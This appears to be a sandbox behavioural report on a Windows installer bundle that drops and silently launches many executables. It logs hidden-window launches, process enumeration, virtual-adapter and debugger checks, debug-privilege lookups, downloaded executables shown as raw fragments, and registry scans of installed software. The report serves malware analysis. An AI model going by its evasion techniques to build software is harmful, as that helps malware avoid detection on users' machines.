file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\3316505.exe
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe
file	C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe
file	C:\Users\test22\AppData\Local\Temp\35-ee468-37b-64bb7-869fa1b301d69\Naesurygoqa.exe
file	C:\Users\test22\AppData\Local\Temp\is-T3D23.tmp\Versium.tmp
file	C:\Users\test22\AppData\Local\Temp\is-HLUV2.tmp\LabPicV3.tmp
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\4_177039.exe
file	C:\Users\test22\AppData\Local\Temp\is-G0C0S.tmp\prolab.tmp
file	C:\Users\test22\AppData\Local\Temp\install.dll
file	C:\Users\test22\AppData\Local\Temp\is-5R3UN.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\itdownload.dll
file	C:\Users\test22\AppData\Local\Temp\is-OI7OR.tmp\lylal220.tmp
file	C:\Users\test22\AppData\Roaming\5931879.exe

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe parameters: filepath: C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe	1	1
ShellExecuteExW May 23, 2021, 10:27 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe parameters: /Verysilent filepath: C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe	1	1
ShellExecuteExW May 23, 2021, 10:22 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\5931879.exe parameters: filepath: C:\Users\test22\AppData\Roaming\5931879.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 52 events)

Time & API	Arguments	Status	Return
Process32FirstW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: [System Process] process_identifier: 0	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: System process_identifier: 4	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: smss.exe process_identifier: 224	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: csrss.exe process_identifier: 300	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: wininit.exe process_identifier: 348	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: csrss.exe process_identifier: 364	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: winlogon.exe process_identifier: 396	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: services.exe process_identifier: 440	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: lsass.exe process_identifier: 456	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: lsm.exe process_identifier: 464	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 568	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 640	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 700	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 776	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 968	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 264	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: spoolsv.exe process_identifier: 820	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 292	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 1192	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: srvany.exe process_identifier: 1244	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: taskhost.exe process_identifier: 1284	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: KMService.exe process_identifier: 1324	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: conhost.exe process_identifier: 1376	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: sppsvc.exe process_identifier: 1800	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: svchost.exe process_identifier: 1876	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: dwm.exe process_identifier: 1496	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: explorer.exe process_identifier: 1848	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: SearchIndexer.exe process_identifier: 2548	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: thunderbird.exe process_identifier: 3960	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: pw.exe process_identifier: 5008	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: audiodg.exe process_identifier: 7936	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: splwow64.exe process_identifier: 3928	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: SearchProtocolHost.exe process_identifier: 3816	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: SearchFilterHost.exe process_identifier: 7776	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: mobsync.exe process_identifier: 6916	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: pw.exe process_identifier: 3220	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: taskhost.exe process_identifier: 4032	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: cmd.exe process_identifier: 3272	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: conhost.exe process_identifier: 4944	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: pw.exe process_identifier: 4244	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: slui.exe process_identifier: 4864	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: hjjgaa.exe process_identifier: 3172	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: RunWW.exe process_identifier: 7232	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: BarSetpFile.exe process_identifier: 4372	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: LabPicV3.exe process_identifier: 7072	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: lylal220.exe process_identifier: 4980	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: Versium.exe process_identifier: 7940	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: LabPicV3.tmp process_identifier: 7664	1	1
Process32NextW May 23, 2021, 10:27 a.m.	snapshot_handle: 0x00000120 process_name: lylal220.tmp process_identifier: 4368	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 23, 2021, 10:27 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes labpicv3.tmp, lylal220.tmp (4 events)

Time & API	Arguments	Status	Return
InternetReadFile May 23, 2021, 10:27 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELO,Èà0~ð @ À@ÈS tí ¬ H.text$} ~ `.rsrctí î@@.reloc n@BH0Z\|BRÀN`({"}{"}{"}( {"}{"}{"}{"}{"}{ "} { "} {"}{"}{ "} {"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{*" request_handle: 0x00cc000c	1	1
InternetReadFile May 23, 2021, 10:27 a.m.	buffer: cJPE\/gmZ2QQXtloDYg1EvYZL8XWs5+bU=", "TrackDecrPrmIv":"nYzT0lUc5GclTDkjF2w\/MMvPyZ7zZmOacQM8FVR8i8U=", "tag":"pirlo2_corona_life_Corona-tips_goodchannel" }îMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELKÂ¿ýà" 0är `@O D@àp H.textHã ä `.rsrcD æ@@.reloc@ì@BSHxnq2(ho {þ{þ{þ{þ{þ{þ*{þN(i&{o1 f(i&{o1 o2 (2(ho 2(ho 2(io 2(io *0J(i&s3 {o4 +o5 (6 o7 o8 -äÞ request_handle: 0x00cc000c	1	1
InternetReadFile May 23, 2021, 10:27 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELül©à0~<î @ @O 08à H.textô\| ~ `.rsrc08 :@@.relocàº@BÐH Z`BRÀNP({"}{"}{"}( {"}{"}{"}{"}{"}{ "} { "} {"}{"}{ "} {"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{*" request_handle: 0x00cc000c	1	1
InternetReadFile May 23, 2021, 10:27 a.m.	buffer: cJPE\/gmZ2QQXtloDYg1EvYZL8XWs5+bU=", "TrackDecrPrmIv":"nYzT0lUc5GclTDkjF2w\/MMvPyZ7zZmOacQM8FVR8i8U=", "tag":"pirlo2_corona_life_Corona-tips_goodchannel" }îMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELKÂ¿ýà" 0är `@O D@àp H.textHã ä `.rsrcD æ@@.reloc@ì@BSHxnq2(ho {þ{þ{þ{þ{þ{þ*{þN(i&{o1 f(i&{o1 o2 (2(ho 2(ho 2(io 2(io *0J(i&s3 {o4 +o5 (6 o7 o8 -äÞ request_handle: 0x00cc000c	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (11 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:20 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:28 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:28 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW May 23, 2021, 10:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

rundll32.exe

Yara rule detected in process memory (9 events)

description	Virtual currency	rule	Virtual_currency_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 54 events)

Time & API	Arguments	Status	Return
RegOpenKeyExA May 23, 2021, 10:27 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{4FEA6706-3728-47C5-B6DE-136FABA4464E}}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4FEA6706-3728-47C5-B6DE-136FABA4464E}}_is1		2
RegOpenKeyExA May 23, 2021, 10:27 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{4FEA6706-3728-47C5-B6DE-136FABA4464E}}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4FEA6706-3728-47C5-B6DE-136FABA4464E}}_is1		2
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000025c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: 7-Zip base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: AddressBook base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Connection Manager base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: DirectDrawEx base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: EditPlus base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: ENTERPRISE base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Fontcore base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Google Chrome base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: IE40 base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: IE4Data base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: IE5BAKEX base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: IEData base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: MobileOptionPack base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: SchedulingAgent base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: Versium Research 10 base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Versium Research 10	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: WIC base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {141446C4-F423-40A0-BB37-10245CF8EAB5}_is1 base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {558E1E6C-4A0D-4F49-9F39-071618575B7F}_is1 base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{558E1E6C-4A0D-4F49-9F39-071618575B7F}_is1	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
